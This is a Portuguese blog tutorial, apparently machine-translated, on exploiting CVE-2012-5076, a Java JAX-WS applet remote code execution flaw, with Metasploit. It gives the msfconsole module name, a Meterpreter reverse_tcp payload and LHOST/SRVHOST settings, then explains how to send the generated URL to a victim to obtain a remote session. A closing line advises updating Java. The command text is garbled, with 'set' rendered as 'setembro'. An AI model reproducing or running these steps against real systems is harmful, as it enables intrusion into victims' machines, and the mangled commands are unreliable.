[CVE-2012-5076] Explorando Java JAX-WS Applet Execução Remota de Código




Publicou recentemente uma nova vulnerabilidade no Java, chamada  Java JAX-WS Applet Execução Remota de Código descoberto por  @ _juan_vazquez_  que afeta a versão  1.7.0_07-b10  e anteriores.

A exploração respectivo para explorar esta vulnerabilidade é respectivamente nos módulos Metasploit e pode ser utilizado para executar tal msfupdate só.

O módulo está disponível no Metasploit  para essa vulnerabilidade aproveita JAX-WS classes de um Applet Java para executar o código Java arbitrária.

Os procedimentos e requisitos de explorar esta vulnerabilidade é muito simples, apenas o suficiente para ter BackTrack e um sistema virtual para testes.


REQUISITOS :

Backtrack 5 R1 - R2 ou R3 (Atacante) 
Metasploit Framework (Atacante) 
Windows XP - 7 (vítima) 
Google Chorme, Firefox ou IE (vítima) PROCEDIMENTO DE ATAQUE : Metasploit Aberto (msfconsole) e executar o seguinte exploit/multi/browser/java_jre17_jaxws PAYLOAD setembro windows / Meterpreter / reverse_tcp 192.168.1.19 SRVHOST setembro setembro TARGET 1 setembro lhost


Como é do conhecimento comum e prática, estes comandos criar uma URL que será enviado para o usuário a executá-lo a partir de qualquer navegador web, ou Google Chorme, Firefox, Internet Explorer ou Opera contendo a versão vulnerável do Java 1.7.0_07- b10  e anteriores.


Então, se o usuário consegue executar o URL gerado em qualquer sistema operacional ou navegador, teremos uma sessão metepreter como mostrado na imagem a seguir:


Portanto, apenas os comandos respectivos iria executar operação e pós-operação para tirar proveito do sistema, vulneráveis ​​a uma URL simples com este novo exploit frescos do forno.



Vídeo tutorial :


Para evitar ser vítima deste ataque, você deve atualizar para a versão mais recente do Java disponível, que pode ser baixado clicando  aqui . Enjoy? (: 

[CVE-2012-5076] Explorando Java JAX-WS Applet Execução Remota de Código [CVE-2012-5076] Explorando Java JAX-WS Applet Execução Remota de Código Reviewed by Kembolle Amilkar on quinta-feira, novembro 22, 2012 Rating: 5

Nenhum comentário